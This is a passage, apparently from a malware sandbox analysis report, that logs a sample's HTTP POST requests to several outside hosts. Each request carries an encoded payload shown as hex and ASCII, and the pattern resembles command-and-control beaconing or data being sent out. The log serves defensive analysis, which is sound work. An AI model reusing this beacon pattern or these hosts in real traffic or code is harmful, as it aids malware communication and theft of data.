4d 49 32 6c 72 64 49 7a 66 61 6e 30 63 4f 6f 5a 48 72 34 2b 54 37 64 45 4c 75 66 36 5a 4d 34 58 54 53 6b 39 74 4b 39 54 61 45 77 58 42 69 6f 4c 71 64 57 79 76 45 46 66 4c 56 33 33 43 46 5a 57 36 31 63 51 65 30 4f 74 47 78 33 70 77 31 30 48 36 6d 6c 46 4a 66 4e 39 70 59 39 30 41 35 4a 35 6e 4d 77 42 75 4f 4b 44 6e 6a 51 33 43 61 7a 44 59 54 52 57 4b 49 54 68 62 56 4e 65 34 30 38 69 4e 44 7a 44 37 4b 57 72 50 41 30 5a 33 71 39 55 66 39 49 47 35 63 41 75 4b 44 51 35 34 73 5a 34 38 4d 39 30 4c 46 4b 77 6d 4e 52 2f 6b 6d 41 59 4b 35 45 7a 46 68 6d 44 59 56 6f 37 4f 39 62 31 31 62 74 70 5a 39 53 66 56 6f 79 50 72 35 62 66 61 4d 73 61 53 6f 78 37 78 44 33 64 55 37 6b 4f 31 6b 76 37 57 36 43 6b 72 75 39 6e 50 72 4c 42 6b 70 39 57 5a 65 68 6e 63 65 4a 4a 50 45 44 4e 4d 70 61 4b 4e 70 71 71 6a 70 69 36 73 35 49 45 6f 59 39 6e 67 4c 32 55 4c 68 61 39 6c 50 68 57 42 76 51 56 57 67 44 74 42 68 69 44 2b 50 77 32 30 73 34 67 2f 6d 78 32 2f 2b 61 32 49 2b 53 6e 76 32 39 53 39 6f 63 38 43 49 48 33 74 6b 62 44 41 57 47 35 46 30 70 55 65 44 78 4d 37 69 71 48 56 63 48 42 2f 34 37 75 63 79 76 71 6e 57 66 67 57 34 70 50 39 4d 50 37 67 49 5a 67 59 64 32 69 6d 66 63 72 58 77 63 6b 51 46 4c 50 79 57 58 66 7a 39 6a 34 4b 6a 6d 65 76 43 2b 6a 2f 55 47 49 41 76 77 3d 3d Data Ascii: SWQQEWUNN5ScESqiDN9tAd5OkOmz3CoZaaj7LLP2e145Dcf7B3Tb27RdZBWc7x6xrJ+6rd8oXFNZeuia80PO98fyZZO9zsb6Xp11/jytJnyK9MJXmsLS5WGccRSxxR2g5M+JUBUFQzT15Kxl6RK1qnBd6chQMTPo7ybEmTwELf8seSm7H9fMI2lrdIzfan0cOoZHr4+T7dELuf6ZM4XTSk9tK9TaEwXBioLqdWyvEFfLV33CFZW61cQe0OtGx3pw10H6mlFJfN9pY90A5J5nMwBuOKDnjQ3CazDYTRWKIThbVNe408iNDzD7KWrPA0Z3q9Uf9IG5cAuKDQ54sZ48M90LFKwmNR/kmAYK5EzFhmDYVo7O9b11btpZ9SfVoyPr5bfaMsaSox7xD3dU7kO1kv7W6Ckru9nPrLBkp9WZehnceJJPEDNMpaKNpqqjpi6s5IEoY9ngL2ULha9lPhWBvQVWgDtBhiD+Pw20s4g/mx2/+a2I+Snv29S9oc8CIH3tkbDAWG5F0pUeDxM7iqHVcHB/47ucyvqnWfgW4pP9MP7gIZgYd2imfcrXwckQFLPyWXfz9j4KjmevC+j/UGIAvw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 6d 4e 41 47 36 7a 62 52 4e 5a 54 31 54 36 69 76 6b 52 66 4d 6f 74 6d 76 31 68 4e 57 76 37 48 42 79 69 6a 43 39 52 56 37 74 6e 66 36 63 35 52 4b 6e 71 79 4d 6a 61 51 55 42 31 32 6c 55 54 43 45 68 30 77 6f 61 6a 50 78 51 66 39 33 32 56 71 6e 6a 49 42 56 36 4e 4b 6e 48 35 72 4d 62 52 6d 44 2b 74 53 68 42 79 67 30 4e 75 47 65 50 76 4b 6f 53 69 57 53 43 64 32 71 6c 5a 58 67 4a 4c 70 5a 69 4f 70 52 73 67 77 34 36 58 44 35 71 39 4a 70 64 58 4b 4f 6a 6e 4e 36 53 6b 4c 39 4d 50 43 5a 4e 68 48 72 52 67 6c 33 55 6e 6d 4c 59 4f 73 4f 64 4b 42 38 32 58 59 53 64 6a 64 35 64 6a 74 2f 54 75 66 5a 6b 5a 76 57 42 2b 6e 49 75 30 72 63 43 6c 5a 49 68 42 4c 68 4d 59 42 37 4f 5a 6d 53 41 54 4b 6a 56 52 74 70 58 68 48 36 5a 77 5a 34 5a 35 73 2b 72 39 45 6b 42 46 73 54 51 43 4a 57 67 76 6c 66 31 37 67 31 41 4d 59 6d 6d 33 72 4b 76 37 6c 53 2b 39 67 57 32 45 79 44 48 4a 45 61 4b 4c 6e 58 74 43 68 75 66 71 4e 4a 45 71 2f 35 71 73 79 79 42 55 70 5a 59 75 32 71 4c 79 61 31 44 33 4d 73 54 47 6b 34 6b 53 52 6d 78 67 75 79 2b 66 6f 6b 76 43 50 64 68 77 36 73 36 65 4f 6c 35 59 49 39 6c 79 2b 49 36 30 54 4c 76 71 56 62 65 63 6d 31 7a 67 31 36 34 4c 71 59 79 38 71 52 48 4d 57 51 32 34 59 4b 43 66 73 56 50 38 6e 6c 6f 62 2f 45 52 76 36 38 6b 74 38 74 37 42 45 78 41 69 31 51 68 70 70 2f 68 33 68 79 4e 48 42 49 78 53 71 39 4a 4d 72 52 71 64 73 42 58 4b 7a 52 6f 72 31 6f 6d 74 63 6d 36 64 71 75 55 69 6d 71 4b 69 56 63 4e 6d 76 48 2b 46 54 76 79 31 46 45 45 77 49 72 76 57 57 42 36 36 6a 51 57 4b 66 77 46 56 34 4b 73 30 30 43 4a 31 78 31 6c 76 66 32 79 69 4d 50 71 49 70 4f 6e 31 64 79 68 46 67 4e 56 6b 5a 51 44 50 53 67 30 2b 70 57 64 51 42 66 4c 64 50 6d 6d 6d 48 76 32 55 6c 75 57 30 72 55 6f 53 4f 47 75 6b 56 6b 42 32 70 36 42 78 71 67 4b 71 72 72 6b 49 76 31 56 51 59 64 65 44 6e 74 59 67 3d 3d Data Ascii: mNAG6zbRNZT1T6ivkRfMotmv1hNWv7HByijC9RV7tnf6c5RKnqyMjaQUB12lUTCEh0woajPxQf932VqnjIBV6NKnH5rMbRmD+tShByg0NuGePvKoSiWSCd2qlZXgJLpZiOpRsgw46XD5q9JpdXKOjnN6SkL9MPCZNhHrRgl3UnmLYOsOdKB82XYSdjd5djt/TufZkZvWB+nIu0rcClZIhBLhMYB7OZmSATKjVRtpXhH6ZwZ4Z5s+r9EkBFsTQCJWgvlf17g1AMYmm3rKv7lS+9gW2EyDHJEaKLnXtChufqNJEq/5qsyyBUpZYu2qLya1D3MsTGk4kSRmxguy+fokvCPdhw6s6eOl5YI9ly+I60TLvqVbecm1zg164LqYy8qRHMWQ24YKCfsVP8nlob/ERv68kt8t7BExAi1Qhpp/h3hyNHBIxSq9JMrRqdsBXKzRor1omtcm6dquUimqKiVcNmvH+FTvy1FEEwIrvWWB66jQWKfwFV4Ks00CJ1x1lvf2yiMPqIpOn1dyhFgNVkZQDPSg0+pWdQBfLdPmmmHv2UluW0rUoSOGukVkB2p6BxqgKqrrkIv1VQYdeDntYg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4d 62 36 38 67 65 42 6c 4d 70 53 55 63 57 79 68 4d 31 39 31 79 68 50 6f 4d 61 4a 49 61 76 30 33 46 49 4e 53 48 4d 62 64 4d 6b 51 72 57 50 71 56 48 6d 61 76 42 36 57 46 2f 50 6f 65 49 6a 43 34 38 77 69 43 50 35 2b 37 47 4b 39 6c 48 56 36 4c 51 61 4c 6c 32 32 6a 63 51 35 61 4a 44 76 49 56 2b 7a 37 6b 42 4b 61 64 54 46 52 2f 42 33 35 65 78 68 67 78 57 57 33 53 63 31 69 6b 4d 51 4f 4e 4a 6c 77 35 66 46 54 77 39 45 44 59 33 47 67 6a 77 30 52 2b 53 72 34 59 70 47 44 6f 73 4a 67 36 5a 7a 6f 58 30 73 54 48 2f 70 4b 37 6e 33 73 6d 4c 46 35 74 6a 33 6b 75 63 4a 31 72 47 56 51 65 4f 6e 62 54 61 70 4d 68 39 34 49 4e 6d 45 57 6a 4b 7a 2f 65 49 38 67 43 30 51 4d 7a 74 71 48 6a 36 68 74 39 53 73 42 6d 56 4f 79 75 50 68 47 45 4f 55 68 56 57 54 31 6b 45 32 77 71 42 57 66 69 5a 30 31 55 61 2b 41 58 77 73 44 2f 38 55 62 44 57 37 77 64 32 63 42 7a 56 67 55 51 34 6e 47 6c 63 51 75 51 51 6f 6d 49 44 4d 32 74 6e 6f 57 45 73 52 4a 34 5a 65 35 4f 53 35 55 51 6b 43 63 58 77 58 2b 38 66 50 79 38 55 45 65 64 6f 76 58 79 61 59 2f 38 57 6e 4a 78 74 59 69 48 41 38 62 36 59 46 45 64 6e 78 30 43 42 38 63 75 4b 75 4e 6a 2f 66 6c 54 51 66 48 77 47 43 71 78 64 54 54 48 63 36 54 4f 55 36 6f 30 73 6f 73 42 4c 42 54 62 52 36 73 2f 59 55 6a 65 56 79 66 58 6e 77 79 31 48 73 63 67 65 73 4b 58 74 73 4e 50 4f 45 47 75 66 61 38 58 49 69 66 48 30 4b 68 58 39 56 43 63 6e 6a 57 50 57 56 35 53 31 75 51 6c 72 43 33 66 55 35 33 73 38 56 6f 47 4c 45 6c 39 31 66 36 59 44 67 59 72 50 45 47 64 64 78 4a 71 77 37 6e 38 39 35 78 75 6f 34 31 74 4e 4b 46 63 2b 69 63 56 4c 6d 7a 2b 45 75 6b 6f 6e 77 43 42 41 71 38 51 71 5a 78 2f 6e 4a 37 5a 2b 63 65 33 63 6b 58 54 7a 59 54 61 57 49 41 5a 4a 74 6f 32 4f 76 6b 31 5a 63 68 53 30 49 4f 6e 65 51 3d 3d Data Ascii: Mb68geBlMpSUcWyhM191yhPoMaJIav03FINSHMbdMkQrWPqVHmavB6WF/PoeIjC48wiCP5+7GK9lHV6LQaLl22jcQ5aJDvIV+z7kBKadTFR/B35exhgxWW3Sc1ikMQONJlw5fFTw9EDY3Ggjw0R+Sr4YpGDosJg6ZzoX0sTH/pK7n3smLF5tj3kucJ1rGVQeOnbTapMh94INmEWjKz/eI8gC0QMztqHj6ht9SsBmVOyuPhGEOUhVWT1kE2wqBWfiZ01Ua+AXwsD/8UbDW7wd2cBzVgUQ4nGlcQuQQomIDM2tnoWEsRJ4Ze5OS5UQkCcXwX+8fPy8UEedovXyaY/8WnJxtYiHA8b6YFEdnx0CB8cuKuNj/flTQfHwGCqxdTTHc6TOU6o0sosBLBTbR6s/YUjeVyfXnwy1HscgesKXtsNPOEGufa8XIifH0KhX9VCcnjWPWV5S1uQlrC3fU53s8VoGLEl91f6YDgYrPEGddxJqw7n895xuo41tNKFc+icVLmz+EukonwCBAq8QqZx/nJ7Z+ce3ckXTzYTaWIAZJto2Ovk1ZchS0IOneQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.maktraxx.comCache-Control: no-cacheData Raw: 4c 77 76 32 73 6c 64 50 50 4a 51 48 51 74 66 49 52 71 53 61 69 71 44 50 71 2f 75 4e 34 73 2b 4d 65 32 44 59 6d 2b 6f 33 48 62 59 41 30 55 4c 4d 4a 33 6e 44 54 6b 71 41 49 46 61 76 4f 59 38 65 48 4e 56 38 37 6f 76 59 50 6e 79 4a 46 59 42 33 5a 62 47 71 35 6e 69 6b 4e 68 44 39 6c 53 30 4e 64 79 45 47 73 6d 6e 4a 66 47 55 63 32 6b 54 44 6f 56 66 70 59 52 33 69 68 31 6c 7a 72 65 63 65 6e 61 37 33 53 62 43 6e 4e 61 56 65 76 69 4e 7a 4e 32 6c 45 70 36 58 52 70 79 56 41 68 4e 5a 37 55 55 42 6f 6e 72 39 32 48 59 30 6e 46 55 78 61 30 77 71 6d 37 76 34 46 78 77 75 67 76 2f 68 6c 71 4c 4b 69 66 78 4c 4e 37 71 54 39 76 66 39 41 54 6a 6c 69 32 44 54 54 47 52 7a 6a 4b 7a 57 59 61 2f 6f 62 50 4c 57 35 37 62 72 2f 73 58 43 73 53 30 42 74 2f 44 64 30 30 4e 38 41 61 52 4a 37 34 4c 67 67 4f 47 46 32 69 37 69 44 72 30 44 4a 46 37 30 43 70 66 4c 6a 4a 58 38 38 64 39 45 69 72 54 6c 2f 78 36 4c 49 67 72 7a 52 75 33 33 31 6c 68 72 43 4d 4e 37 77 31 42 59 41 57 6a 4e 70 6d 35 65 4e 4c 68 67 54 65 52 44 2b 30 58 31 75 64 68 70 67 6e 68 53 53 77 4d 41 4b 44 2f 68 35 79 74 71 57 67 79 61 50 5a 4c 52 7a 53 6d 2f 2f 4f 4c 6d 56 35 70 59 62 32 75 78 4f 73 4d 54 79 66 66 76 75 2b 6a 54 4c 71 66 4d 57 77 57 58 6b 58 78 70 57 43 59 57 79 4c 65 59 34 54 6c 30 77 68 68 57 4a 4c 52 4b 69 32 4e 75 4f 57 4d 38 72 76 4f 69 65 58 70 45 78 4d 57 63 48 35 79 77 39 68 38 58 33 2f 70 53 34 68 5a 57 4d 4b 53 5a 44 55 41 37 41 32 4f 75 52 66 46 55 41 67 33 71 76 76 56 37 79 64 46 34 49 4a 6f 69 44 43 6c 45 43 72 31 64 6c 61 6a 32 76 58 47 2b 46 61 44 34 63 54 6f 48 50 69 74 57 41 66 4f 57 45 32 35 6b 59 57 46 68 42 37 50 67 55 38 64 35 79 35 33 51 69 70 68 6a 4a 55 70 2f 59 35 7a 7a 76 54 71 4b 38 44 33 35 2b 30 57 55 7a 41 6c 71 64 4c 62 6d 4b 44 67 3d 3d Data Ascii: Lwv2sldPPJQHQtfIRqSaiqDPq/uN4s+Me2DYm+o3HbYA0ULMJ3nDTkqAIFavOY8eHNV87ovYPnyJFYB3ZbGq5nikNhD9lS0NdyEGsmnJfGUc2kTDoVfpYR3ih1lzrecena73SbCnNaVeviNzN2lEp6XRpyVAhNZ7UUBonr92HY0nFUxa0wqm7v4Fxwugv/hlqLKifxLN7qT9vf9ATjli2DTTGRzjKzWYa/obPLW57br/sXCsS0Bt/Dd00N8AaRJ74LggOGF2i7iDr0DJF70CpfLjJX88d9EirTl/x6LIgrzRu331lhrCMN7w1BYAWjNpm5eNLhgTeRD+0X1udhpgnhSSwMAKD/h5ytqWgyaPZLRzSm//OLmV5pYb2uxOsMTyffvu+jTLqfMWwWXkXxpWCYWyLeY4Tl0whhWJLRKi2NuOWM8rvOieXpExMWcH5yw9h8X3/pS4hZWMKSZDUA7A2OuRfFUAg3qvvV7ydF4IJoiDClECr1dlaj2vXG+FaD4cToHPitWAfOWE25kYWFhB7PgU8d5y53QiphjJUp/Y5zzvTqK8D35+0WUzAlqdLbmKDg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 6b 6f 2b 42 74 30 49 7a 72 63 79 69 39 73 62 49 4e 64 6b 59 70 63 57 31 67 73 68 53 43 47 35 79 6c 6b 32 46 62 70 6c 6f 6a 4c 66 63 6f 6e 44 74 75 53 73 37 7a 61 78 50 50 4d 41 55 6d 43 6d 42 2f 68 47 42 36 52 46 44 31 36 76 57 4b 2b 34 2b 6b 79 38 72 38 63 66 71 44 52 4e 66 64 61 64 48 67 57 4a 30 49 45 79 6e 57 58 64 70 79 78 37 68 50 30 32 78 42 57 6b 62 33 51 2b 70 4a 6b 6d 38 56 59 4a 43 56 68 41 38 5a 44 6b 5a 57 31 35 61 74 67 32 36 72 4b 30 49 49 52 36 57 36 57 2f 57 6b 50 6c 62 6e 71 37 69 4d 6b 45 64 45 37 71 51 78 58 65 47 6c 38 50 57 43 53 42 57 53 52 45 33 47 37 66 42 73 62 47 2b 4d 46 35 65 49 62 67 5a 56 41 55 41 36 36 32 74 37 67 48 32 58 42 2f 4c 62 51 51 4b 35 32 6e 6c 48 63 79 6b 6e 48 71 37 7a 32 69 33 72 43 76 45 6f 74 48 36 6e 78 33 46 53 45 6e 57 45 64 37 6c 43 42 6f 51 4e 4a 74 6c 2f 39 69 55 74 48 58 4d 32 67 4e 37 77 67 55 56 31 67 70 54 7a 30 7a 6e 52 50 31 79 30 34 76 76 77 6c 2b 4f 72 78 69 63 55 4a 38 4c 33 52 53 46 33 71 76 39 73 5a 49 35 71 53 51 6d 4a 6b 44 72 6b 6f 44 4c 37 54 76 33 6b 39 66 62 6a 31 69 50 5a 56 35 46 71 49 6c 67 5a 62 71 45 74 65 4e 32 71 33 55 59 6e 6d 6b 55 53 67 5a 75 63 41 51 46 76 44 46 78 47 61 32 6f 6e 5a 76 42 61 41 2f 67 2f 72 50 4c 62 66 59 47 59 4e 77 52 43 66 73 2f 34 34 64 61 73 52 4b 47 4b 4c 30 4e 4c 32 6f 53 43 72 43 39 4a 31 36 71 7a 34 35 62 76 59 66 39 50 73 36 73 56 55 52 69 54 6e 4a 6e 42 48 49 6c 61 52 33 71 41 69 37 54 68 4d 37 76 79 71 72 75 55 79 61 75 35 70 6c 6b 46 56 72 59 2f 53 54 5a 4a 7a 4d 7a 6d 48 4d 4d 68 59 30 30 73 6b 39 44 52 4b 54 78 61 4c 58 4b 5a 5a 78 70 63 63 53 2f 4b 46 65 6b 65 76 6c 70 63 52 52 70 32 7a 77 56 78 57 6a 42 45 63 7a 38 56 61 50 6e 4a 31 7a 62 68 31 70 76 32 31 41 4b 4d 50 51 3d Data Ascii: ko+Bt0Izrcyi9sbINdkYpcW1gshSCG5ylk2FbplojLfconDtuSs7zaxPPMAUmCmB/hGB6RFD16vWK+4+ky8r8cfqDRNfdadHgWJ0IEynWXdpyx7hP02xBWkb3Q+pJkm8VYJCVhA8ZDkZW15atg26rK0IIR6W6W/WkPlbnq7iMkEdE7qQxXeGl8PWCSBWSRE3G7fBsbG+MF5eIbgZVAUA662t7gH2XB/LbQQK52nlHcyknHq7z2i3rCvEotH6nx3FSEnWEd7lCBoQNJtl/9iUtHXM2gN7wgUV1gpTz0znRP1y04vvwl+OrxicUJ8L3RSF3qv9sZI5qSQmJkDrkoDL7Tv3k9fbj1iPZV5FqIlgZbqEteN2q3UYnmkUSgZucAQFvDFxGa2onZvBaA/g/rPLbfYGYNwRCfs/44dasRKGKL0NL2oSCrC9J16qz45bvYf9Ps6sVURiTnJnBHIlaR3qAi7ThM7vyqruUyau5plkFVrY/STZJzMzmHMMhY00sk9DRKTxaLXKZZxpccS/KFekevlpcRRp2zwVxWjBEcz8VaPnJ1zbh1pv21AKMPQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 74 71 41 6a 5a 41 7a 41 4f 5a 53 46 33 58 58 57 64 33 73 4f 68 78 39 44 46 50 6e 6b 58 56 5a 51 41 45 71 6c 37 56 4a 50 51 6c 43 58 6b 6e 70 51 49 62 6b 73 34 7a 6b 77 4c 75 6c 73 77 74 6d 72 63 4e 54 52 38 4d 77 65 69 57 4d 6e 7a 71 6f 73 65 59 50 4d 79 75 57 32 31 64 57 75 72 68 37 32 2f 6a 73 47 42 4d 33 36 41 46 54 71 64 50 41 68 42 69 52 44 56 71 72 31 6d 43 2b 41 37 33 31 68 66 46 34 44 66 41 44 68 45 7a 56 31 32 75 4e 43 49 77 62 7a 33 45 48 53 76 6f 71 6b 41 4f 64 42 39 78 46 50 58 4b 71 50 57 4d 6c 6a 47 52 58 38 52 5a 52 36 45 58 5a 4c 67 4f 30 61 55 43 52 32 4c 53 72 4e 4a 58 6b 52 62 64 6a 6c 2b 2b 57 62 72 56 75 77 67 65 42 6f 69 38 4c 48 4f 37 4f 4d 4c 6c 4f 62 31 30 39 32 51 30 4b 55 6a 37 43 36 51 77 66 43 6a 70 36 61 74 32 75 72 55 53 68 64 4b 7a 67 57 4e 4a 6f 38 52 4b 2f 6a 2f 33 71 66 55 73 2f 58 4f 44 77 53 61 64 63 53 73 61 35 2f 58 35 79 39 48 74 6c 61 74 43 2b 64 48 34 79 46 41 59 64 76 4b 51 47 31 67 68 63 37 47 39 5a 61 56 79 48 44 45 6b 5a 4b 35 6d 72 4e 6e 53 63 4f 38 39 4d 6a 45 69 45 5a 75 56 76 68 4a 55 58 68 77 76 69 65 34 52 5a 4b 71 39 6a 76 6d 33 78 48 48 57 38 77 70 2f 35 72 79 61 59 77 6c 36 2f 48 74 56 6b 33 54 2b 41 44 58 66 6f 7a 61 74 32 36 53 63 47 36 43 64 74 48 44 61 77 37 67 4c 71 5a 75 55 41 45 67 4f 6b 54 71 47 77 79 76 49 6e 6a 54 33 36 4a 4e 35 6b 4b 42 50 73 64 36 49 72 59 4f 6c 72 48 56 57 6e 71 46 47 39 54 42 70 47 35 34 43 46 32 42 50 65 5a 30 68 6e 63 4e 32 37 46 4f 30 76 6a 39 4d 6a 76 39 62 62 52 38 68 72 64 6d 52 39 67 68 47 38 59 75 63 75 7a 53 77 53 6b 51 79 6e 36 50 51 4d 6e 35 44 35 75 77 4e 71 69 43 55 56 58 50 31 41 4a 58 51 30 36 4e 39 79 2b 6e 5a 79 53 62 37 6d 7a 6f 73 4e 38 37 4d 56 4c 54 6b 52 2f 34 78 4c 55 5a 50 78 76 57 7a 67 39 52 6a 4d 70 46 78 47 55 42 59 42 4e 37 69 31 49 53 52 2b 70 Data Ascii: tqAjZAzAOZSF3XXWd3sOhx9DFPnkXVZQAEql7VJPQlCXknpQIbks4zkwLulswtmrcNTR8MweiWMnzqoseYPMyuW21dWurh72/jsGBM36AFTqdPAhBiRDVqr1mC+A731hfF4DfADhEzV12uNCIwbz3EHSvoqkAOdB9xFPXKqPWMljGRX8RZR6EXZLgO0aUCR2LSrNJXkRbdjl++WbrVuwgeBoi8LHO7OMLlOb1092Q0KUj7C6QwfCjp6at2urUShdKzgWNJo8RK/j/3qfUs/XODwSadcSsa5/X5y9HtlatC+dH4yFAYdvKQG1ghc7G9ZaVyHDEkZK5mrNnScO89MjEiEZuVvhJUXhwvie4RZKq9jvm3xHHW8wp/5ryaYwl6/HtVk3T+ADXfozat26ScG6CdtHDaw7gLqZuUAEgOkTqGwyvInjT36JN5kKBPsd6IrYOlrHVWnqFG9TBpG54CF2BPeZ0hncN27FO0vj9Mjv9bbR8hrdmR9ghG8YucuzSwSkQyn6PQMn5D5uwNqiCUVXP1AJXQ06N9y+nZySb7mzosN87MVLTkR/4xLUZPxvWzg9RjMpFxGUBYBN7i1ISR+p
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 53 57 51 51 45 57 55 4e 4e 35 53 63 45 53 71 69 44 4e 39 74 41 64 35 4f 6b 4f 6d 7a 33 43 6f 5a 61 61 6a 37 4c 4c 50 32 65 31 34 35 44 63 66 37 42 33 54 62 32 37 52 64 5a 42 57 63 37 78 36 78 72 4a 2b 36 72 64 38 6f 58 46 4e 5a 65 75 69 61 38 30 50 4f 39 38 66 79 5a 5a 4f 39 7a 73 62 36 58 70 31 31 2f 6a 79 74 4a 6e 79 4b 39 4d 4a 58 6d 73 4c 53 35 57 47 63 63 52 53 78 78 52 32 67 35 4d 2b 4a 55 42 55 46 51 7a 54 31 35 4b 78 6c 36 52 4b 31 71 6e 42 64 36 63 68 51 4d 54 50 6f 37 79 62 45 6d 54 77 45 4c 66 38 73 65 53 6d 37 48 39 66 4d 49 32 6c 72 64 49 7a 66 61 6e 30 63 4f 6f 5a 48 72 34 2b 54 37 64 45 4c 75 66 36 5a 4d 34 58 54 53 6b 39 74 4b 39 54 61 45 77 58 42 69 6f 4c 71 64 57 79 76 45 46 66 4c 56 33 33 43 46 5a 57 36 31 63 51 65 30 4f 74 47 78 33 70 77 31 30 48 36 6d 6c 46 4a 66 4e 39 70 59 39 30 41 35 4a 35 6e 4d 77 42 75 4f 4b 44 6e 6a 51 33 43 61 7a 44 59 54 52 57 4b 49 54 68 62 56 4e 65 34 30 38 69 4e 44 7a 44 37 4b 57 72 50 41 30 5a 33 71 39 55 66 39 49 47 35 63 41 75 4b 44 51 35 34 73 5a 34 38 4d 39 30 4c 46 4b 77 6d 4e 52 2f 6b 6d 41 59 4b 35 45 7a 46 68 6d 44 59 56 6f 37 4f 39 62 31 31 62 74 70 5a 39 53 66 56 6f 79 50 72 35 62 66 61 4d 73 61 53 6f 78 37 78 44 33 64 55 37 6b 4f 31 6b 76 37 57 36 43 6b 72 75 39 6e 50 72 4c 42 6b 70 39 57 5a 65 68 6e 63 65 4a 4a 50 45 44 4e 4d 70 61 4b 4e 70 71 71 6a 70 69 36 73 35 49 45 6f 59 39 6e 67 4c 32 55 4c 68 61 39 6c 50 68 57 42 76 51 56 57 67 44 74 42 68 69 44 2b 50 77 32 30 73 34 67 2f 6d 78 32 2f 2b 61 32 49 2b 53 6e 76 32 39 53 39 6f 63 38 43 49 48 33 74 6b 62 44 41 57 47 35 46 30 70 55 65 44 78 4d 37 69 71 48 56 63 48 42 2f 34 37 75 63 79 76 71 6e 57 66 67 57 34 70 50 39 4d 50 37 67 49 5a 67 59 64 32 69 6d 66 63 72 58 77 63 6b 51 46 4c 50 79 57 58 66 7a 39 6a 34 4b 6a 6d 65 76 43 2b 6a 2f 55 47 49 41 76 77 3d 3d Data Ascii: SWQQEWUNN5ScESqiDN9tAd5OkOmz3CoZaaj7LLP2e145Dcf7B3Tb27RdZBWc7x6xrJ+6rd8oXFNZeuia80PO98fyZZO9zsb6Xp11/jytJnyK9MJXmsLS5WGccRSxxR2g5M+JUBUFQzT15Kxl6RK1qnBd6chQMTPo7ybEmTwELf8seSm7H9fMI2lrdIzfan0cOoZHr4+T7dELuf6ZM4XTSk9tK9TaEwXBioLqdWyvEFfLV33CFZW61cQe0OtGx3pw10H6mlFJfN9pY90A5J5nMwBuOKDnjQ3CazDYTRWKIThbVNe408iNDzD7KWrPA0Z3q9Uf9IG5cAuKDQ54sZ48M90LFKwmNR/kmAYK5EzFhmDYVo7O9b11btpZ9SfVoyPr5bfaMsaSox7xD3dU7kO1kv7W6Ckru9nPrLBkp9WZehnceJJPEDNMpaKNpqqjpi6s5IEoY9ngL2ULha9lPhWBvQVWgDtBhiD+Pw20s4g/mx2/+a2I+Snv29S9oc8CIH3tkbDAWG5F0pUeDxM7iqHVcHB/47ucyvqnWfgW4pP9MP7gIZgYd2imfcrXwckQFLPyWXfz9j4KjmevC+j/UGIAvw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 34 39 75 44 43 73 75 46 77 4d 78 76 43 54 31 6f 49 71 42 58 61 44 52 79 35 53 4d 52 72 50 64 75 4c 2b 79 79 76 44 56 2b 78 47 68 56 2b 58 36 31 41 32 49 68 6d 59 64 35 47 38 38 33 6a 79 58 6a 38 54 53 39 47 74 57 74 47 66 43 51 6e 48 58 59 65 38 74 62 2b 42 59 45 57 32 7a 41 55 62 58 69 7a 44 4b 36 2b 66 43 70 65 6d 4f 76 61 54 42 36 4a 59 32 76 37 2b 4b 71 6f 33 77 66 62 70 4b 6d 43 71 59 4e 4a 72 4c 66 79 42 44 69 33 38 7a 75 2f 42 4f 4a 63 4f 62 6d 59 66 6b 73 4a 31 44 41 30 36 74 58 47 55 45 6b 35 65 72 72 6b 68 53 30 72 73 6b 44 4f 68 4d 75 4a 39 58 38 43 6a 46 36 53 36 4e 4d 61 53 41 35 43 2b 41 61 65 63 6e 48 5a 41 56 54 69 36 6c 50 62 61 77 4e 70 49 4d 63 77 70 61 55 79 69 42 64 66 47 45 68 35 66 35 6e 74 37 42 30 39 44 79 36 51 6d 79 67 69 78 47 68 6c 66 76 52 68 44 65 61 58 7a 4d 74 44 45 7a 71 6a 62 52 65 78 54 57 64 45 48 33 46 32 78 47 58 70 70 48 42 48 50 53 50 44 39 6c 56 42 70 31 34 73 41 6c 72 64 78 77 33 48 52 65 4b 52 72 41 2b 76 6b 35 52 73 64 55 71 76 47 44 6d 44 53 6c 52 67 46 6d 57 76 44 5a 41 78 71 59 62 6c 42 75 6f 67 48 31 67 34 45 69 74 7a 78 4e 41 50 6b 38 43 44 42 36 43 51 62 4a 69 54 74 2f 76 6f 6b 4d 61 35 78 2b 4c 7a 58 6c 36 73 77 43 6a 39 75 52 45 38 59 36 4c 46 5a 53 46 74 61 43 69 41 63 47 49 6b 39 52 6e 67 37 49 6d 4e 6e 68 46 6f 31 6c 4c 4a 38 63 70 47 58 74 6b 73 76 6a 6b 2f 74 46 39 46 4d 58 58 79 67 67 33 76 77 42 48 63 43 57 36 71 49 48 58 76 77 6e 32 42 35 50 31 59 36 4e 69 64 30 71 76 65 71 63 2b 56 76 4f 57 4b 6e 61 6f 5a 51 75 41 30 47 6d 65 72 67 4d 61 6b 41 32 43 59 75 43 78 2b 62 74 76 64 49 67 51 6b 68 32 53 70 4f 41 75 57 70 59 55 69 34 4f 6c 37 39 51 65 76 66 58 76 31 31 6f 50 58 75 51 51 66 